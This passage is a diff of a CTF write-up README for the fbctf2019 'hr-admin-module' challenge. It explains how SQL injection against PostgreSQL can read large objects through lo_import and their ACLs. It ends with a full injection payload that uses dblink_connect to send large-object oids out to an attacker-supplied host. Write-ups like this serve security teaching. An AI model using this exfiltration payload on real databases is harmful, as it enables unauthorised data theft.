PDKT-Team/ctf/fbctf2019/hr-admin-module/README.md

     0x0050:  706f 7374 6772 6573 0000                 postgres..
 ```

-We got 24668 as `oid` so it means that we can use `lo_import` function.
-Unfortunately, we will not get any results if we try to select the content of large object using `lo_get(24668)` or directly accessing `pg_largeobject` catalog.
-Seems like the current user doesn't have permission to read the content of new object.
+We got 24668 as `oid` so that means we can use `lo_import` function.
+Unfortunately, we won't get any results if we try to get the content of large object using `lo_get(24668)` or directly access the `pg_largeobject` catalog.
+It looks like the current user doesn't have permission to read the content of new objects.

-After reading the documentation of large objects in PostgreSQL, we can know if large objects can has ACL (Access Control List).
-That means, if there is an old object with ACL that allows current user to read it, then we can exfiltrate that object's content.
+After reading the documentation of large objects in PostgreSQL, we can find out that large objects can has ACL (Access Control List).
+That means, if there is an old object with an ACL that allows current user to read it, then we can exfiltrate that object's content.

-We can get the list of available large object's `oid` by extracting from `pg_largeobject_metadata`.
+We can get a list of available large object's `oid` by extracting from `pg_largeobject_metadata`.

 ```
 asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT string_agg(cast(l.oid as text), ':') FROM pg_largeobject_metadata l) || ' password=postgres dbname=postgres')) --